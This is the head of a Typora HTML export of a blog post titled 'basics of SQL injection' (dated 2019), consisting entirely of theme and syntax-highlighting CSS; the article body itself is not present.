sql注入的基础.html

---
title: Sql
date: 2019-08-07 16:51:44
---
<!doctype html>
<html>
<head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width initial-scale=1'>
<title>sql注入的基础</title><style type='text/css'>html {overflow-x: initial !important;}:root { --bg-color:#ffffff; --text-color:#333333; --select-text-bg-color:#B5D6FC; --select-text-font-color:auto; --monospace:"Lucida Console",Consolas,"Courier",monospace; }
html { font-size: 14px; background-color: var(--bg-color); color: var(--text-color); font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; -webkit-font-smoothing: antialiased; }
body { margin: 0px; padding: 0px; height: auto; bottom: 0px; top: 0px; left: 0px; right: 0px; font-size: 1rem; line-height: 1.42857; overflow-x: hidden; background: inherit; tab-size: 4; }
iframe { margin: auto; }
a.url { word-break: break-all; }
a:active, a:hover { outline: 0px; }
.in-text-selection, ::selection { text-shadow: none; background: var(--select-text-bg-color); color: var(--select-text-font-color); }
#write { margin: 0px auto; height: auto; width: inherit; word-break: normal; overflow-wrap: break-word; position: relative; white-space: normal; overflow-x: visible; padding-top: 40px; }
#write.first-line-indent p { text-indent: 2em; }
#write.first-line-indent li p, #write.first-line-indent p * { text-indent: 0px; }
#write.first-line-indent li { margin-left: 2em; }
.for-image #write { padding-left: 8px; padding-right: 8px; }
body.typora-export { padding-left: 30px; padding-right: 30px; }
.typora-export .footnote-line, .typora-export li, .typora-export p { white-space: pre-wrap; }
@media screen and (max-width: 500px) {
  body.typora-export { padding-left: 0px; padding-right: 0px; }
  #write { padding-left: 20px; padding-right: 20px; }
  .CodeMirror-sizer { margin-left: 0px !important; }
  .CodeMirror-gutters { display: none !important; }
}
#write li > figure:last-child { margin-bottom: 0.5rem; }
#write ol, #write ul { position: relative; }
img { max-width: 100%; vertical-align: middle; }
button, input, select, textarea { color: inherit; font: inherit; }
input[type="checkbox"], input[type="radio"] { line-height: normal; padding: 0px; }
*, ::after, ::before { box-sizing: border-box; }
#write h1, #write h2, #write h3, #write h4, #write h5, #write h6, #write p, #write pre { width: inherit; }
#write h1, #write h2, #write h3, #write h4, #write h5, #write h6, #write p { position: relative; }
p { line-height: inherit; }
h1, h2, h3, h4, h5, h6 { break-after: avoid-page; break-inside: avoid; orphans: 2; }
p { orphans: 4; }
h1 { font-size: 2rem; }
h2 { font-size: 1.8rem; }
h3 { font-size: 1.6rem; }
h4 { font-size: 1.4rem; }
h5 { font-size: 1.2rem; }
h6 { font-size: 1rem; }
.md-math-block, .md-rawblock, h1, h2, h3, h4, h5, h6, p { margin-top: 1rem; margin-bottom: 1rem; }
.hidden { display: none; }
.md-blockmeta { color: rgb(204, 204, 204); font-weight: 700; font-style: italic; }
a { cursor: pointer; }
sup.md-footnote { padding: 2px 4px; background-color: rgba(238, 238, 238, 0.7); color: rgb(85, 85, 85); border-radius: 4px; cursor: pointer; }
sup.md-footnote a, sup.md-footnote a:hover { color: inherit; text-transform: inherit; text-decoration: inherit; }
#write input[type="checkbox"] { cursor: pointer; width: inherit; height: inherit; }
figure { overflow-x: auto; margin: 1.2em 0px; max-width: calc(100% + 16px); padding: 0px; }
figure > table { margin: 0px !important; }
tr { break-inside: avoid; break-after: auto; }
thead { display: table-header-group; }
table { border-collapse: collapse; border-spacing: 0px; width: 100%; overflow: auto; break-inside: auto; text-align: left; }
table.md-table td { min-width: 32px; }
.CodeMirror-gutters { border-right: 0px; background-color: inherit; }
.CodeMirror-linenumber { user-select: none; }
.CodeMirror { text-align: left; }
.CodeMirror-placeholder { opacity: 0.3; }
.CodeMirror pre { padding: 0px 4px; }
.CodeMirror-lines { padding: 0px; }
div.hr:focus { cursor: none; }
#write pre { white-space: pre-wrap; }
#write.fences-no-line-wrapping pre { white-space: pre; }
#write pre.ty-contain-cm { white-space: normal; }
.CodeMirror-gutters { margin-right: 4px; }
.md-fences { font-size: 0.9rem; display: block; break-inside: avoid; text-align: left; overflow: visible; white-space: pre; background: inherit; position: relative !important; }
.md-diagram-panel { width: 100%; margin-top: 10px; text-align: center; padding-top: 0px; padding-bottom: 8px; overflow-x: auto; }
#write .md-fences.mock-cm { white-space: pre-wrap; }
.md-fences.md-fences-with-lineno { padding-left: 0px; }
#write.fences-no-line-wrapping .md-fences.mock-cm { white-space: pre; overflow-x: auto; }
.md-fences.mock-cm.md-fences-with-lineno { padding-left: 8px; }
.CodeMirror-line, twitterwidget { break-inside: avoid; }
.footnotes { opacity: 0.8; font-size: 0.9rem; margin-top: 1em; margin-bottom: 1em; }
.footnotes + .footnotes { margin-top: 0px; }
.md-reset { margin: 0px; padding: 0px; border: 0px; outline: 0px; vertical-align: top; background: 0px 0px; text-decoration: none; text-shadow: none; float: none; position: static; width: auto; height: auto; white-space: nowrap; cursor: inherit; -webkit-tap-highlight-color: transparent; line-height: normal; font-weight: 400; text-align: left; box-sizing: content-box; direction: ltr; }
li div { padding-top: 0px; }
blockquote { margin: 1rem 0px; }
li .mathjax-block, li p { margin: 0.5rem 0px; }
li { margin: 0px; position: relative; }
blockquote > :last-child { margin-bottom: 0px; }
blockquote > :first-child, li > :first-child { margin-top: 0px; }
.footnotes-area { color: rgb(136, 136, 136); margin-top: 0.714rem; padding-bottom: 0.143rem; white-space: normal; }
#write .footnote-line { white-space: pre-wrap; }
@media print {
  body, html { border: 1px solid transparent; height: 99%; break-after: avoid; break-before: avoid; }
  #write { margin-top: 0px; padding-top: 0px; border-color: transparent !important; }
  .typora-export * { -webkit-print-color-adjust: exact; }
  html.blink-to-pdf { font-size: 13px; }
  .typora-export #write { padding-left: 32px; padding-right: 32px; padding-bottom: 0px; break-after: avoid; }
  .typora-export #write::after { height: 0px; }
}
.footnote-line { margin-top: 0.714em; font-size: 0.7em; }
a img, img a { cursor: pointer; }
pre.md-meta-block { font-size: 0.8rem; min-height: 0.8rem; white-space: pre-wrap; background: rgb(204, 204, 204); display: block; overflow-x: hidden; }
p > .md-image:only-child:not(.md-img-error) img, p > img:only-child { display: block; margin: auto; }
p > .md-image:only-child { display: inline-block; width: 100%; }
#write .MathJax_Display { margin: 0.8em 0px 0px; }
.md-math-block { width: 100%; }
.md-math-block:not(:empty)::after { display: none; }
[contenteditable="true"]:active, [contenteditable="true"]:focus { outline: 0px; box-shadow: none; }
.md-task-list-item { position: relative; list-style-type: none; }
.task-list-item.md-task-list-item { padding-left: 0px; }
.md-task-list-item > input { position: absolute; top: 0px; left: 0px; margin-left: -1.2em; margin-top: calc(1em - 10px); border: none; }
.math { font-size: 1rem; }
.md-toc { min-height: 3.58rem; position: relative; font-size: 0.9rem; border-radius: 10px; }
.md-toc-content { position: relative; margin-left: 0px; }
.md-toc-content::after, .md-toc::after { display: none; }
.md-toc-item { display: block; color: rgb(65, 131, 196); }
.md-toc-item a { text-decoration: none; }
.md-toc-inner:hover { text-decoration: underline; }
.md-toc-inner { display: inline-block; cursor: pointer; }
.md-toc-h1 .md-toc-inner { margin-left: 0px; font-weight: 700; }
.md-toc-h2 .md-toc-inner { margin-left: 2em; }
.md-toc-h3 .md-toc-inner { margin-left: 4em; }
.md-toc-h4 .md-toc-inner { margin-left: 6em; }
.md-toc-h5 .md-toc-inner { margin-left: 8em; }
.md-toc-h6 .md-toc-inner { margin-left: 10em; }
@media screen and (max-width: 48em) {
  .md-toc-h3 .md-toc-inner { margin-left: 3.5em; }
  .md-toc-h4 .md-toc-inner { margin-left: 5em; }
  .md-toc-h5 .md-toc-inner { margin-left: 6.5em; }
  .md-toc-h6 .md-toc-inner { margin-left: 8em; }
}
a.md-toc-inner { font-size: inherit; font-style: inherit; font-weight: inherit; line-height: inherit; }
.footnote-line a:not(.reversefootnote) { color: inherit; }
.md-attr { display: none; }
.md-fn-count::after { content: "."; }
code, pre, samp, tt { font-family: var(--monospace); }
kbd { margin: 0px 0.1em; padding: 0.1em 0.6em; font-size: 0.8em; color: rgb(36, 39, 41); background: rgb(255, 255, 255); border: 1px solid rgb(173, 179, 185); border-radius: 3px; box-shadow: rgba(12, 13, 14, 0.2) 0px 1px 0px, rgb(255, 255, 255) 0px 0px 0px 2px inset; white-space: nowrap; vertical-align: middle; }
.md-comment { color: rgb(162, 127, 3); opacity: 0.8; font-family: var(--monospace); }
code { text-align: left; vertical-align: initial; }
a.md-print-anchor { white-space: pre !important; border-width: initial !important; border-style: none !important; border-color: initial !important; display: inline-block !important; position: absolute !important; width: 1px !important; right: 0px !important; outline: 0px !important; background: 0px 0px !important; text-decoration: initial !important; text-shadow: initial !important; }
.md-inline-math .MathJax_SVG .noError { display: none !important; }
.html-for-mac .inline-math-svg .MathJax_SVG { vertical-align: 0.2px; }
.md-math-block .MathJax_SVG_Display { text-align: center; margin: 0px; position: relative; text-indent: 0px; max-width: none; max-height: none; min-height: 0px; min-width: 100%; width: auto; overflow-y: hidden; display: block !important; }
.MathJax_SVG_Display, .md-inline-math .MathJax_SVG_Display { width: auto; margin: inherit; display: inline-block !important; }
.MathJax_SVG .MJX-monospace { font-family: var(--monospace); }
.MathJax_SVG .MJX-sans-serif { font-family: sans-serif; }
.MathJax_SVG { display: inline; font-style: normal; font-weight: 400; line-height: normal; zoom: 90%; text-indent: 0px; text-align: left; text-transform: none; letter-spacing: normal; word-spacing: normal; overflow-wrap: normal; white-space: nowrap; float: none; direction: ltr; max-width: none; max-height: none; min-width: 0px; min-height: 0px; border: 0px; padding: 0px; margin: 0px; }
.MathJax_SVG * { transition: none 0s ease 0s; }
.MathJax_SVG_Display svg { vertical-align: middle !important; margin-bottom: 0px !important; margin-top: 0px !important; }
.os-windows.monocolor-emoji .md-emoji { font-family: "Segoe UI Symbol", sans-serif; }
.md-diagram-panel > svg { max-width: 100%; }
[lang="mermaid"] svg, [lang="flow"] svg { max-width: 100%; height: auto; }
[lang="mermaid"] .node text { font-size: 1rem; }
table tr th { border-bottom: 0px; }
video { max-width: 100%; display: block; margin: 0px auto; }
iframe { max-width: 100%; width: 100%; border: none; }
.highlight td, .highlight tr { border: 0px; }


.CodeMirror { height: auto; }
.CodeMirror.cm-s-inner { background: inherit; }
.CodeMirror-scroll { overflow: auto hidden; z-index: 3; }
.CodeMirror-gutter-filler, .CodeMirror-scrollbar-filler { background-color: rgb(255, 255, 255); }
.CodeMirror-gutters { border-right: 1px solid rgb(221, 221, 221); background: inherit; white-space: nowrap; }
.CodeMirror-linenumber { padding: 0px 3px 0px 5px; text-align: right; color: rgb(153, 153, 153); }
.cm-s-inner .cm-keyword { color: rgb(119, 0, 136); }
.cm-s-inner .cm-atom, .cm-s-inner.cm-atom { color: rgb(34, 17, 153); }
.cm-s-inner .cm-number { color: rgb(17, 102, 68); }
.cm-s-inner .cm-def { color: rgb(0, 0, 255); }
.cm-s-inner .cm-variable { color: rgb(0, 0, 0); }
.cm-s-inner .cm-variable-2 { color: rgb(0, 85, 170); }
.cm-s-inner .cm-variable-3 { color: rgb(0, 136, 85); }
.cm-s-inner .cm-string { color: rgb(170, 17, 17); }
.cm-s-inner .cm-property { color: rgb(0, 0, 0); }
.cm-s-inner .cm-operator { color: rgb(152, 26, 26); }
.cm-s-inner .cm-comment, .cm-s-inner.cm-comment { color: rgb(170, 85, 0); }
.cm-s-inner .cm-string-2 { color: rgb(255, 85, 0); }
.cm-s-inner .cm-meta { color: rgb(85, 85, 85); }
.cm-s-inner .cm-qualifier { color: rgb(85, 85, 85); }
.cm-s-inner .cm-builtin { color: rgb(51, 0, 170); }
.cm-s-inner .cm-bracket { color: rgb(153, 153, 119); }
.cm-s-inner .cm-tag { color: rgb(17, 119, 0); }
.cm-s-inner .cm-attribute { color: rgb(0, 0, 204); }
.cm-s-inner .cm-header, .cm-s-inner.cm-header { color: rgb(0, 0, 255); }
.cm-s-inner .cm-quote, .cm-s-inner.cm-quote { color: rgb(0, 153, 0); }
.cm-s-inner .cm-hr, .cm-s-inner.cm-hr { color: rgb(153, 153, 153); }
.cm-s-inner .cm-link, .cm-s-inner.cm-link { color: rgb(0, 0, 204); }
.cm-negative { color: rgb(221, 68, 68); }
.cm-positive { color: rgb(34, 153, 34); }
.cm-header, .cm-strong { font-weight: 700; }
.cm-del { text-decoration: line-through; }
.cm-em { font-style: italic; }
.cm-link { text-decoration: underline; }
.cm-error { color: red; }
.cm-invalidchar { color: red; }
.cm-constant { color: rgb(38, 139, 210); }
.cm-defined { color: rgb(181, 137, 0); }
div.CodeMirror span.CodeMirror-matchingbracket { color: rgb(0, 255, 0); }
div.CodeMirror span.CodeMirror-nonmatchingbracket { color: rgb(255, 34, 34); }
.cm-s-inner .CodeMirror-activeline-background { background: inherit; }
.CodeMirror { position: relative; overflow: hidden; }
.CodeMirror-scroll { height: 100%; outline: 0px; position: relative; box-sizing: content-box; background: inherit; }
.CodeMirror-sizer { position: relative; }
.CodeMirror-gutter-filler, .CodeMirror-hscrollbar, .CodeMirror-scrollbar-filler, .CodeMirror-vscrollbar { position: absolute; z-index: 6; display: none; }
.CodeMirror-vscrollbar { right: 0px; top: 0px; overflow: hidden; }
.CodeMirror-hscrollbar { bottom: 0px; left: 0px; overflow: hidden; }
.CodeMirror-scrollbar-filler { right: 0px; bottom: 0px; }
.CodeMirror-gutter-filler { left: 0px; bottom: 0px; }
.CodeMirror-gutters { position: absolute; left: 0px; top: 0px; padding-bottom: 30px; z-index: 3; }
.CodeMirror-gutter { white-space: normal; height: 100%; box-sizing: content-box; padding-bottom: 30px; margin-bottom: -32px; display: inline-block; }
.CodeMirror-gutter-wrapper { position: absolute; z-index: 4; background: 0px 0px !important; border: none !important; }
.CodeMirror-gutter-background { position: absolute; top: 0px; bottom: 0px; z-index: 4; }
.CodeMirror-gutter-elt { position: absolute; cursor: default; z-index: 4; }
.CodeMirror-lines { cursor: text; }
.CodeMirror pre { border-radius: 0px; border-width: 0px; background: 0px 0px; font-family: inherit; font-size: inherit; margin: 0px; white-space: pre; overflow-wrap: normal; color: inherit; z-index: 2; position: relative; overflow: visible; }
.CodeMirror-wrap pre { overflow-wrap: break-word; white-space: pre-wrap; word-break: normal; }
.CodeMirror-code pre { border-right: 30px solid transparent; width: fit-content; }
.CodeMirror-wrap .CodeMirror-code pre { border-right: none; width: auto; }
.CodeMirror-linebackground { position: absolute; left: 0px; right: 0px; top: 0px; bottom: 0px; z-index: 0; }
.CodeMirror-linewidget { position: relative; z-index: 2; overflow: auto; }
.CodeMirror-wrap .CodeMirror-scroll { overflow-x: hidden; }
.CodeMirror-measure { position: absolute; width: 100%; height: 0px; overflow: hidden; visibility: hidden; }
.CodeMirror-measure pre { position: static; }
.CodeMirror div.CodeMirror-cursor { position: absolute; visibility: hidden; border-right: none; width: 0px; }
.CodeMirror div.CodeMirror-cursor { visibility: hidden; }
.CodeMirror-focused div.CodeMirror-cursor { visibility: inherit; }
.cm-searching { background: rgba(255, 255, 0, 0.4); }
@media print {
  .CodeMirror div.CodeMirror-cursor { visibility: hidden; }
}


.cm-s-inner .cm-variable, .cm-s-inner .cm-operator, .cm-s-inner .cm-property { color: rgb(184, 191, 198); }
.cm-s-inner .cm-keyword { color: rgb(200, 143, 208); }
.cm-s-inner .cm-tag { color: rgb(125, 244, 106); }
.cm-s-inner .cm-attribute { color: rgb(117, 117, 228); }
.CodeMirror div.CodeMirror-cursor { border-left: 1px solid rgb(184, 191, 198); z-index: 3; }
.cm-s-inner .cm-string { color: rgb(210, 107, 107); }
.cm-s-inner .cm-comment, .cm-s-inner.cm-comment { color: rgb(218, 146, 74); }
.cm-s-inner .cm-header, .cm-s-inner .cm-def, .cm-s-inner.cm-header, .cm-s-inner.cm-def { color: rgb(141, 141, 240); }
.cm-s-inner .cm-quote, .cm-s-inner.cm-quote { color: rgb(87, 172, 87); }
.cm-s-inner .cm-hr { color: rgb(216, 213, 213); }
.cm-s-inner .cm-link { color: rgb(211, 211, 239); }
.cm-s-inner .cm-negative { color: rgb(217, 80, 80); }
.cm-s-inner .cm-positive { color: rgb(80, 230, 80); }
.cm-s-inner .cm-string-2 { color: rgb(255, 85, 0); }
.cm-s-inner .cm-meta, .cm-s-inner .cm-qualifier { color: rgb(183, 179, 179); }
.cm-s-inner .cm-builtin { color: rgb(243, 179, 248); }
.cm-s-inner .cm-bracket { color: rgb(153, 153, 119); }
.cm-s-inner .cm-atom, .cm-s-inner.cm-atom { color: rgb(132, 182, 203); }
.cm-s-inner .cm-number { color: rgb(100, 171, 143); }
.cm-s-inner .cm-variable { color: rgb(184, 191, 198); }
.cm-s-inner .cm-variable-2 { color: rgb(159, 186, 213); }
.cm-s-inner .cm-variable-3 { color: rgb(28, 198, 133); }
.CodeMirror-selectedtext, .CodeMirror-selected { background: rgb(74, 137, 220); text-shadow: none; color: rgb(255, 255, 255) !important; }
.CodeMirror-gutters { border-right: none; }


:root { --bg-color: #363B40; --side-bar-bg-color: #2E3033; --text-color: #b8bfc6; --select-text-bg-color:#4a89dc; --control-text-color: #b7b7b7; --control-text-hover-color: #eee; --window-border: 1px solid #555; --active-file-bg-color: rgb(34, 34, 34); --active-file-border-color: #8d8df0; --active-file-text-color: white; --item-hover-bg-color: #70717d; --item-hover-text-color: white; --primary-color: #6dc1e7; --rawblock-edit-panel-bd: #333; }
html { font-size: 16px; }
html, body { text-size-adjust: 100%; background: var(--bg-color); fill: currentcolor; line-height: 1.625rem; }
#write { max-width: 914px; }
html, body, button, input, select, textarea, div.code-tooltip-content { color: rgb(184, 191, 198); border-color: transparent; }
div.code-tooltip, .md-hover-tip .md-arrow::after { background: rgb(51, 51, 51); }
.popover.bottom > .arrow::after { border-bottom-color: rgb(51, 51, 51); }
html, body, button, input, select, textarea { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; }
hr { height: 2px; border: 0px; margin: 24px 0px !important; }
h1, h2, h3, h4, h5, h6 { font-family: "Lucida Grande", Corbel, sans-serif; font-weight: normal; clear: both; overflow-wrap: break-word; margin: 0px; padding: 0px; color: rgb(222, 222, 222); }
h1 { font-size: 2.5rem; line-height: 2.75rem; margin-bottom: 1.5rem; letter-spacing: -1.5px; }
h2 { font-size: 1.63rem; line-height: 1.875rem; margin-bottom: 1.5rem; letter-spacing: -1px; font-weight: bold; }
h3 { font-size: 1.17rem; line-height: 1.5rem; margin-bottom: 1.5rem; letter-spacing: -1px; font-weight: bold; }
h4 { font-size: 1.12rem; line-height: 1.375rem; margin-bottom: 1.5rem; color: white; }
h5 { font-size: 0.97rem; line-height: 1.25rem; margin-bottom: 1.5rem; font-weight: bold; }
h6 { font-size: 0.93rem; line-height: 1rem; margin-bottom: 0.75rem; color: white; }
@media (min-width: 980px) {
  h3.md-focus::before, h4.md-focus::before, h5.md-focus::before, h6.md-focus::before { color: rgb(221, 221, 221); border: 1px solid rgb(221, 221, 221); border-radius: 3px; position: absolute; left: -1.64286rem; top: 0.357143rem; float: left; font-size: 9px; padding-left: 2px; padding-right: 2px; vertical-align: bottom; font-weight: normal; line-height: normal; }
  h3.md-focus::before { content: "h3"; }
  h4.md-focus::before { content: "h4"; }
  h5.md-focus::before { content: "h5"; top: 0px; }
  h6.md-focus::before { content: "h6"; top: 0px; }
}
a { text-decoration: none; outline: 0px; }
a:hover { outline: 0px; }
a:focus { outline: dotted thin; }
sup.md-footnote { background-color: rgb(85, 85, 85); color: rgb(221, 221, 221); }
p { overflow-wrap: break-word; }
p, ul, dd, ol, hr, address, pre, table, iframe, .wp-caption, .wp-audio-shortcode, .wp-video-shortcode { margin-top: 0px; margin-bottom: 1.5rem; }
li > blockquote { margin-bottom: 0px; }
audio:not([controls]) { display: none; }
[hidden] { display: none; }
.in-text-selection, ::selection { background: rgb(74, 137, 220); color: rgb(255, 255, 255); text-shadow: none; }
ul, ol { padding: 0px 0px 0px 1.875rem; }
ul { list-style: square; }
ol { list-style: decimal; }
ul ul, ol ol, ul ol, ol ul { margin: 0px; }
b, th, dt, strong { font-weight: bold; }
i, em, dfn, cite { font-style: italic; }
blockquote { margin: 35px 0px 1.875rem 1.875rem; border-left: 2px solid rgb(71, 77, 84); padding-left: 30px; }
pre, code, kbd, tt, var { background: rgba(0, 0, 0, 0.05); font-size: 0.875rem; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; }
kbd { padding: 2px 4px; font-size: 90%; color: rgb(255, 255, 255); background-color: rgb(51, 51, 51); border-radius: 3px; box-shadow: rgba(0, 0, 0, 0.25) 0px -1px 0px inset; }
pre.md-fences { padding: 10px 10px 10px 30px; margin-bottom: 20px; background: rgb(51, 51, 51); }
.CodeMirror-gutters { background: rgb(51, 51, 51); border-right: 1px solid transparent; }
.enable-diagrams pre.md-fences[lang="sequence"] .code-tooltip, .enable-diagrams pre.md-fences[lang="flow"] .code-tooltip, .enable-diagrams pre.md-fences[lang="mermaid"] .code-tooltip { bottom: -2.2em; right: 4px; }
code, kbd, tt, var { padding: 2px 5px; }
table { max-width: 100%; width: 100%; border-collapse: collapse; border-spacing: 0px; }
th, td { padding: 5px 10px; vertical-align: top; }
a { transition: all 0.2s ease-in-out 0s; }
hr { background: rgb(71, 77, 84); }
h1 { margin-top: 2em; }
a { color: rgb(224, 224, 224); text-decoration: underline; }
a:hover { color: rgb(255, 255, 255); }
.md-inline-math script { color: rgb(129, 177, 219); }
b, th, dt, strong { color: rgb(222, 222, 222); }
mark { background: rgb(211, 212, 14); }
blockquote { color: rgb(157, 162, 166); }
table a { color: rgb(222, 222, 222); }
th, td { border: 1px solid rgb(71, 77, 84); }
.task-list { padding-left: 0px; }
.md-task-list-item { padding-left: 1.25rem; }
.md-task-list-item > input { top: auto; }
.md-task-list-item > input::before { content: ""; display: inline-block; width: 0.875rem; height: 0.875rem; vertical-align: middle; text-align: center; border: 1px solid rgb(184, 191, 198); background-color: rgb(54, 59, 64); margin-top: -0.4rem; }
.md-task-list-item > input:checked::before, .md-task-list-item > input[checked]::before { content: "√"; font-size: 0.625rem; line-height: 0.625rem; color: rgb(222, 222, 222); }
.auto-suggest-container { border: 0px; background-color: rgb(82, 92, 101); }
#typora-quick-open { background-color: rgb(82, 92, 101); }
#typora-quick-open input { background-color: rgb(82, 92, 101); border-width: 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-left-style: initial; border-top-color: initial; border-right-color: initial; border-left-color: initial; border-image: initial; border-bottom-style: solid; border-bottom-color: grey; }
.typora-quick-open-item { background-color: inherit; color: inherit; }
.typora-quick-open-item.active, .typora-quick-open-item:hover { background-color: rgb(77, 139, 219); color: white; }
.typora-quick-open-item:hover { background-color: rgba(77, 139, 219, 0.8); }
.typora-search-spinner > div { background-color: rgb(255, 255, 255); }
#write pre.md-meta-block { border-bottom: 1px dashed rgb(204, 204, 204); background: transparent; padding-bottom: 0.6em; line-height: 1.6em; }
.btn, .btn .btn-default { background: transparent; color: rgb(184, 191, 198); }
.ty-table-edit { border-top: 1px solid gray; background-color: rgb(54, 59, 64); }
.popover-title { background: transparent; }
.md-image > .md-meta { color: rgb(187, 187, 187); background: transparent; }
.md-expand.md-image > .md-meta { color: rgb(221, 221, 221); }
#write > h3::before, #write > h4::before, #write > h5::before, #write > h6::before { border: none; border-radius: 0px; color: rgb(136, 136, 136); text-decoration: underline; left: -1.4rem; top: 0.2rem; }
#write > h3.md-focus::before { top: 2px; }
#write > h4.md-focus::before { top: 2px; }
.md-toc-item { color: rgb(168, 194, 220); }
#write div.md-toc-tooltip { background-color: rgb(54, 59, 64); }
.dropdown-menu .btn:hover, .dropdown-menu .btn:focus, .md-toc .btn:hover, .md-toc .btn:focus { color: white; background: black; }
#toc-dropmenu { background: rgba(50, 54, 59, 0.93); border: 1px solid rgba(253, 253, 253, 0.15); }
#toc-dropmenu .divider { background-color: rgb(155, 155, 155); }
.outline-expander::before { top: 2px; }
#typora-sidebar { box-shadow: none; border-right: none; }
.sidebar-tabs { border-bottom: 0px; }
#typora-sidebar:hover .outline-title-wrapper { border-left: 1px dashed; }
.outline-title-wrapper .btn { color: inherit; }
.outline-item:hover { border-color: rgb(54, 59, 64); background-color: rgb(54, 59, 64); color: white; }
h1.md-focus .md-attr, h2.md-focus .md-attr, h3.md-focus .md-attr, h4.md-focus .md-attr, h5.md-focus .md-attr, h6.md-focus .md-attr, .md-header-span .md-attr { color: rgb(140, 142, 146); display: inline; }
.md-comment { color: rgb(90, 149, 227); opacity: 1; }
.md-inline-math g, .md-inline-math svg { stroke: rgb(184, 191, 198) !important; fill: rgb(184, 191, 198) !important; }
[md-inline="inline_math"] { color: rgb(156, 178, 233); }
#math-inline-preview .md-arrow::after { background: black; }
.modal-content { background: var(--bg-color); border: 0px; }
.modal-title { font-size: 1.5em; }
.modal-content input { background-color: rgba(26, 21, 21, 0.51); color: white; }
.modal-content .input-group-addon { background-color: rgba(0, 0, 0, 0.17); color: white; }
.modal-backdrop { background-color: rgba(174, 174, 174, 0.7); }
.modal-content .btn-primary { border-color: var(--primary-color); }
.md-table-resize-popover { background-color: rgb(51, 51, 51); }
.form-inline .input-group .input-group-addon { color: white; }
#md-searchpanel { border-bottom: 1px dashed grey; }
.context-menu, #spell-check-panel, #footer-word-count-info { background-color: rgb(66, 70, 74); }
.context-menu.dropdown-menu .divider, .dropdown-menu .divider { background-color: rgb(119, 119, 119); }
footer { color: inherit; }
@media (max-width: 1000px) {
  footer { border-top: none; }
  footer:hover { color: inherit; }
}
#file-info-file-path .file-info-field-value:hover { background-color: rgb(85, 85, 85); color: rgb(222, 222, 222); }
.megamenu-content, .megamenu-opened header { background: var(--bg-color); }
.megamenu-menu-panel h2, .megamenu-menu-panel h1, .long-btn { color: inherit; }
.megamenu-menu-panel input[type="text"] { background: inherit; border-width: 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-left-style: initial; border-color: initial; border-image: initial; border-bottom-style: solid; }
#recent-file-panel-action-btn { background: inherit; border: 1px solid grey; }
.megamenu-menu-panel .dropdown-menu > li > a { color: inherit; background-color: rgb(47, 53, 58); text-decoration: none; }
.megamenu-menu-panel table td:nth-child(1) { color: inherit; font-weight: bold; }
.megamenu-menu-panel tbody tr:hover td:nth-child(1) { color: white; }
.modal-footer .btn-default, .modal-footer .btn-primary, .modal-footer .btn-default:not(:hover) { border: 1px solid transparent; }
.btn-default:hover, .btn-default:focus, .btn-default.focus, .btn-default:active, .btn-default.active, .open > .dropdown-toggle.btn-default { color: white; border: 1px solid rgb(221, 221, 221); background-color: inherit; }
.modal-header { border-bottom: 0px; }
.modal-footer { border-top: 0px; }
#recent-file-panel tbody tr:nth-child(2n-1) { background-color: transparent !important; }
.megamenu-menu-panel tbody tr:hover td:nth-child(2) { color: inherit; }
.megamenu-menu-panel .btn { border: 1px solid rgb(238, 238, 238); background: transparent; }
.mouse-hover .toolbar-icon.btn:hover, #w-full.mouse-hover, #w-pin.mouse-hover { background-color: inherit; }
.typora-node::-webkit-scrollbar { width: 5px; }
.typora-node::-webkit-scrollbar-thumb:vertical { background: rgba(250, 250, 250, 0.3); }
.typora-node::-webkit-scrollbar-thumb:vertical:active { background: rgba(250, 250, 250, 0.5); }
#w-unpin { background-color: rgb(65, 130, 196); }
#top-titlebar, #top-titlebar * { color: var(--item-hover-text-color); }
.typora-sourceview-on #toggle-sourceview-btn, #footer-word-count:hover, .ty-show-word-count #footer-word-count { background: rgb(51, 51, 51); }
#toggle-sourceview-btn:hover { color: rgb(238, 238, 238); background: rgb(51, 51, 51); }
.on-focus-mode .md-end-block:not(.md-focus):not(.md-focus-container) * { color: rgb(104, 104, 104) !important; }
.on-focus-mode .md-end-block:not(.md-focus) img, .on-focus-mode .md-task-list-item:not(.md-focus-container) > input { }
.on-focus-mode li[cid]:not(.md-focus-container) { color: rgb(104, 104, 104); }
.on-focus-mode .md-fences.md-focus .CodeMirror-code > :not(.CodeMirror-activeline) *, .on-focus-mode .CodeMirror.cm-s-inner:not(.CodeMirror-focused) * { color: rgb(104, 104, 104) !important; }
.on-focus-mode .md-focus, .on-focus-mode .md-focus-container { color: rgb(255, 255, 255); }
.on-focus-mode #typora-source .CodeMirror-code > :not(.CodeMirror-activeline) * { color: rgb(104, 104, 104) !important; }
#write .md-focus .md-diagram-panel { border: 1px solid rgb(221, 221, 221); margin-left: -1px; width: calc(100% + 2px); }
#write .md-focus.md-fences-with-lineno .md-diagram-panel { margin-left: auto; }
.md-diagram-panel-error { color: rgb(241, 144, 142); }
.active-tab-files #info-panel-tab-file, .active-tab-files #info-panel-tab-file:hover, .active-tab-outline #info-panel-tab-outline, .active-tab-outline #info-panel-tab-outline:hover { color: rgb(238, 238, 238); }
.sidebar-footer-item:hover, .footer-item:hover { background: inherit; color: white; }
.ty-side-sort-btn.active, .ty-side-sort-btn:hover, .selected-folder-menu-item a::after { color: white; }
#sidebar-files-menu { border: 1px solid; box-shadow: rgba(0, 0, 0, 0.79) 4px 4px 20px; background-color: var(--bg-color); }
.file-list-item { border-bottom: none; }
.file-list-item-summary { opacity: 1; }
.file-list-item.active:first-child { border-top: none; }
.file-node-background { height: 32px; }
.file-library-node.active > .file-node-content, .file-list-item.active { color: var(--active-file-text-color); }
.file-library-node.active > .file-node-background { background-color: var(--active-file-bg-color); }
.file-list-item.active { background-color: var(--active-file-bg-color); }
#ty-tooltip { background-color: black; color: rgb(238, 238, 238); }
.md-task-list-item > input { margin-left: -1.3em; margin-top: 0.3rem; -webkit-appearance: none; }
.md-mathjax-midline { background-color: rgb(87, 97, 107); border-bottom: none; }
footer.ty-footer { border-color: rgb(101, 101, 101); }


</style>
</head>
<body class='typora-export os-windows' >
